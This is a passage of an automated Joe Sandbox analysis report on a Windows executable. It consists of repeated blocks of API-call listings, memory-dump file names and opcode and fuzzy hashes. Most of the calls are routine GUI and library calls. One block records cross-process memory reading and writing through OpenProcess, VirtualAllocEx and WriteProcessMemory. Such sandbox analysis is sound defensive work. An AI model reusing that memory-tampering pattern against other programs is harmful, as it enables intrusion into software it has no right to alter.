                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: HeapInformationToken$AllocateErrorLastProcess
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 47921759-0
                                                                                                                  • Opcode ID: 391331e634658bfa11affd2af2cb41dc98eaba51d05d05ffb6884f2c6b375409
                                                                                                                  • Instruction ID: d8e1df0b63d93e8d7b439b71281f19fbb00e5dadf488075a088fe33399812e8b
                                                                                                                  • Opcode Fuzzy Hash: 391331e634658bfa11affd2af2cb41dc98eaba51d05d05ffb6884f2c6b375409
                                                                                                                  • Instruction Fuzzy Hash: 15F04F752003046FEB211FA9EC88E7B3B6EFF4A764F04802AF941C7251CB649842DA70
                                                                                                                  APIs
                                                                                                                  • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00DAB7A5
                                                                                                                  • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00DAB7AF
                                                                                                                  • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00DAB7BE
                                                                                                                  • RtlAllocateHeap.NTDLL(00000000,?,00000002), ref: 00DAB7C5
                                                                                                                  • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00DAB7DB
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: HeapInformationToken$AllocateErrorLastProcess
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 47921759-0
                                                                                                                  • Opcode ID: 2d2c625cb801f44e1a3569454b4ff4aa3bcfcf5f4ec41a3e3813f185303e8379
                                                                                                                  • Instruction ID: 996a5aa081ceb7be468b2cff4d78715d49f0be3907ce3488fb3972a310da0169
                                                                                                                  • Opcode Fuzzy Hash: 2d2c625cb801f44e1a3569454b4ff4aa3bcfcf5f4ec41a3e3813f185303e8379
                                                                                                                  • Instruction Fuzzy Hash: CFF04F712403046FEB101FA5AC89E7B3BAEFF86765F14801AFA41C7251DBA09C42DA70
                                                                                                                  APIs
                                                                                                                  • GetDlgItem.USER32(?,000003E9), ref: 00DAFA8F
                                                                                                                  • GetWindowTextW.USER32(00000000,?,00000100), ref: 00DAFAA6
                                                                                                                  • MessageBeep.USER32(00000000), ref: 00DAFABE
                                                                                                                  • KillTimer.USER32(?,0000040A), ref: 00DAFADA
                                                                                                                  • EndDialog.USER32(?,00000001), ref: 00DAFAF4
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3741023627-0
                                                                                                                  • Opcode ID: 222e4bc53b97284a253ec89a614eb69064b8f9adbfd98415648290e9225b1083
                                                                                                                  • Instruction ID: 1c61ebd7d6bcf6bcd56bc4ca23975210c51851adda5448923db0cc62062b369f
                                                                                                                  • Opcode Fuzzy Hash: 222e4bc53b97284a253ec89a614eb69064b8f9adbfd98415648290e9225b1083
                                                                                                                  • Instruction Fuzzy Hash: 9A018130500705ABEB20AB50DD4EBE677BABB01B09F0445A9B58BE56E0DBF0A944CB60
                                                                                                                  APIs
                                                                                                                  • EndPath.GDI32(?), ref: 00D8B526
                                                                                                                  • StrokeAndFillPath.GDI32(?,?,00DEF583,00000000,?), ref: 00D8B542
                                                                                                                  • SelectObject.GDI32(?,00000000), ref: 00D8B555
                                                                                                                  • DeleteObject.GDI32 ref: 00D8B568
                                                                                                                  • StrokePath.GDI32(?), ref: 00D8B583
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Path$ObjectStroke$DeleteFillSelect
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2625713937-0
                                                                                                                  • Opcode ID: 2af850239f95600b7f83835c1f06b00696a0f01b354859213c658c0a6ab68ce1
                                                                                                                  • Instruction ID: 025928bd1e34dbf366f6d88e05e0d80d9de231afcd17faf25506b1885a07d722
                                                                                                                  • Opcode Fuzzy Hash: 2af850239f95600b7f83835c1f06b00696a0f01b354859213c658c0a6ab68ce1
                                                                                                                  • Instruction Fuzzy Hash: 48F0C930004708AFDB196F26ED0CB657FE6E701322F188299F4A5942F0CB308999DF28
                                                                                                                  APIs
                                                                                                                  • CoInitialize.OLE32(00000000), ref: 00DBFAB2
                                                                                                                  • CoCreateInstance.COMBASE(00DFDA7C,00000000,00000001,00DFD8EC,?), ref: 00DBFACA
                                                                                                                    • Part of subcall function 00D7CAEE: _memmove.LIBCMT ref: 00D7CB2F
                                                                                                                  • CoUninitialize.COMBASE ref: 00DBFD2D
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CreateInitializeInstanceUninitialize_memmove
                                                                                                                  • String ID: .lnk
                                                                                                                  • API String ID: 2683427295-24824748
                                                                                                                  • Opcode ID: 15851182bc683263d07ee7e911159bd8ea2562537cc6b8f6af1843356b3db37c
                                                                                                                  • Instruction ID: 7ffaa4a34e0f5aa0e1c5a3ab31f2f473db999297f61e88cfe5c722f874fe710f
                                                                                                                  • Opcode Fuzzy Hash: 15851182bc683263d07ee7e911159bd8ea2562537cc6b8f6af1843356b3db37c
                                                                                                                  • Instruction Fuzzy Hash: 18A11971508305AFC300EF64C891EABB7EDEF98714F40895DB55997191EB70EA09CBB2
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: #$+
                                                                                                                  • API String ID: 0-2552117581
                                                                                                                  • Opcode ID: 2cf878088e97fcd3ac985d08be501fac5038148a1190f45fa01bb955977ee8fc
                                                                                                                  • Instruction ID: 2b608d8555013be72ebd79c145831569259d07c90c4592bda96c2476c73674ca
                                                                                                                  • Opcode Fuzzy Hash: 2cf878088e97fcd3ac985d08be501fac5038148a1190f45fa01bb955977ee8fc
                                                                                                                  • Instruction Fuzzy Hash: 6C51DA355042868FDB15FF69C480AEA7BB5EF2A310F284056F991AB2E0D734AC46CB35
                                                                                                                  APIs
                                                                                                                  • CharUpperBuffW.USER32(0000000C,00000016,00000016,00000000,00000000,?,00000000,00E0DC40,?,0000000F,0000000C,00000016,00E0DC40,?), ref: 00DB507B
                                                                                                                    • Part of subcall function 00D784A6: __swprintf.LIBCMT ref: 00D784E5
                                                                                                                    • Part of subcall function 00D784A6: __itow.LIBCMT ref: 00D78519
                                                                                                                    • Part of subcall function 00D7B8A7: _memmove.LIBCMT ref: 00D7B8FB
                                                                                                                  • CharUpperBuffW.USER32(?,?,00000000,?), ref: 00DB50FB
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: BuffCharUpper$__itow__swprintf_memmove
                                                                                                                  • String ID: REMOVE$THIS
                                                                                                                  • API String ID: 2528338962-776492005
                                                                                                                  • Opcode ID: 9ad37b013c8d526adb10c2bd26fb08727e39872d658f77a60e4a1e98daf592ca
                                                                                                                  • Instruction ID: 42da766861291d862655edde4d9828ba82ea9b518f0e8154a77363e9039debe0
                                                                                                                  • Opcode Fuzzy Hash: 9ad37b013c8d526adb10c2bd26fb08727e39872d658f77a60e4a1e98daf592ca
                                                                                                                  • Instruction Fuzzy Hash: F7418E34A00609DFCB01EF58D881BAEB7B6FF48344F088069E85AAB256DB70DD41CB71
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00DB4D41: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00DAC9FE,?,?,00000034,00000800,?,00000034), ref: 00DB4D6B
                                                                                                                  • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 00DACFC9
                                                                                                                    • Part of subcall function 00DB4D0C: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00DACA2D,?,?,00000800,?,00001073,00000000,?,?), ref: 00DB4D36
                                                                                                                    • Part of subcall function 00DB4C65: GetWindowThreadProcessId.USER32(?,?), ref: 00DB4C90
                                                                                                                    • Part of subcall function 00DB4C65: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00DAC9C2,00000034,?,?,00001004,00000000,00000000), ref: 00DB4CA0
                                                                                                                    • Part of subcall function 00DB4C65: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00DAC9C2,00000034,?,?,00001004,00000000,00000000), ref: 00DB4CB6
                                                                                                                  • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00DAD036
                                                                                                                  • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00DAD083
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                                                                                  • String ID: @
                                                                                                                  • API String ID: 4150878124-2766056989
                                                                                                                  • Opcode ID: 1da49d9708635a0227a114fab45cea8abbb67c7fbf3f41fc1884fb3e6ec61c67
                                                                                                                  • Instruction ID: df902fba10fcf54dee71ca820d03d2aa5fff91b6d9a410a2f081815a3a13160d
                                                                                                                  • Opcode Fuzzy Hash: 1da49d9708635a0227a114fab45cea8abbb67c7fbf3f41fc1884fb3e6ec61c67
                                                                                                                  • Instruction Fuzzy Hash: 7C412C76900218AFDB10DFA4CC85FEEBB79EF49700F148095EA46BB181DA706E45CB71
                                                                                                                  APIs
                                                                                                                  • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,00E0DBF0,00000000,?,?,?,?), ref: 00DDA4E6
                                                                                                                  • GetWindowLongW.USER32 ref: 00DDA503
                                                                                                                  • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00DDA513
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Window$Long
                                                                                                                  • String ID: SysTreeView32
                                                                                                                  • API String ID: 847901565-1698111956
                                                                                                                  • Opcode ID: 7b8268f88a64d96125498b082581bdd7e757e60c4e7c7b96182555661991602a
                                                                                                                  • Instruction ID: 9fbd448a9ae966d3c60faa1bba2ae1743e59dee47aa4951369b01eb771b69325
                                                                                                                  • Opcode Fuzzy Hash: 7b8268f88a64d96125498b082581bdd7e757e60c4e7c7b96182555661991602a
                                                                                                                  • Instruction Fuzzy Hash: 4B319231100205AFDB119F78DC45BEA7B69EF49324F248726F979A32E1D770E8509B70
                                                                                                                  APIs
                                                                                                                  • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 00DDA74F
                                                                                                                  • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 00DDA75D
                                                                                                                  • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00DDA764
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: MessageSend$DestroyWindow
                                                                                                                  • String ID: msctls_updown32
                                                                                                                  • API String ID: 4014797782-2298589950
                                                                                                                  • Opcode ID: 9ac542bc48dd7eef0fce1cf3ab035c5eeceb166577d337c3e9584289ce56a6d2
                                                                                                                  • Instruction ID: f969c566ead912c8f295597ea5c4b02096fc8a7fe10b1b807c559517050baf14
                                                                                                                  • Opcode Fuzzy Hash: 9ac542bc48dd7eef0fce1cf3ab035c5eeceb166577d337c3e9584289ce56a6d2
                                                                                                                  • Instruction Fuzzy Hash: E9213DB5600209AFDB14DF68DCC5EBB7BADEB49394B08445AFA019B351C670EC11CA71
                                                                                                                  APIs
                                                                                                                  • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00DD983D
                                                                                                                  • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00DD984D
                                                                                                                  • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00DD9872
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: MessageSend$MoveWindow
                                                                                                                  • String ID: Listbox
                                                                                                                  • API String ID: 3315199576-2633736733
                                                                                                                  • Opcode ID: 618f36b58d6d388c1934be331a24ea78c4a0b7ae735a58c8e5e9777a3cc5f490
                                                                                                                  • Instruction ID: c3637fcaecbce1e3269dbb17668fd0188b4671c1a32412bc0ab44d2a033a9bc5
                                                                                                                  • Opcode Fuzzy Hash: 618f36b58d6d388c1934be331a24ea78c4a0b7ae735a58c8e5e9777a3cc5f490
                                                                                                                  • Instruction Fuzzy Hash: 1E21F632610218BFEF118F54CC85FBB7BAAEF89B54F018125F904AB290C6729C11DBB0
                                                                                                                  APIs
                                                                                                                  • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00DDA27B
                                                                                                                  • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00DDA290
                                                                                                                  • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00DDA29D
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: MessageSend
                                                                                                                  • String ID: msctls_trackbar32
                                                                                                                  • API String ID: 3850602802-1010561917
                                                                                                                  • Opcode ID: ed967069478be72f6755c349489c8bdd297a49321a3c753ab90b97d191323650
                                                                                                                  • Instruction ID: fe28ab0700f344a6b752df6601c2b79e0c0572479ef19783fa2c0e7034bc04b0
                                                                                                                  • Opcode Fuzzy Hash: ed967069478be72f6755c349489c8bdd297a49321a3c753ab90b97d191323650
                                                                                                                  • Instruction Fuzzy Hash: F011E771240308BEDB245F65CC46FA73B69EF88B54F019119FA55A6190D272E851CB74
                                                                                                                  APIs
                                                                                                                  • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize), ref: 00D92F79
                                                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 00D92F80
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: AddressLibraryLoadProc
                                                                                                                  • String ID: RoInitialize$combase.dll
                                                                                                                  • API String ID: 2574300362-340411864
                                                                                                                  • Opcode ID: 03b32ce5d047d22f47bfd27c21488e40deffd022e417b2095383de9e663b2ad6
                                                                                                                  • Instruction ID: 53f7fc0c2ab7b30d09195b174224392e52a4ec375fea3b252135b2992fd0705e
                                                                                                                  • Opcode Fuzzy Hash: 03b32ce5d047d22f47bfd27c21488e40deffd022e417b2095383de9e663b2ad6
                                                                                                                  • Instruction Fuzzy Hash: A2E01270695308AFEF206F73EC8DB253A6BAB10B06F048064B202E11A0DBF54058EF28
                                                                                                                  APIs
                                                                                                                  • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,00D92F4E), ref: 00D9304E
                                                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 00D93055
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmpDownload File
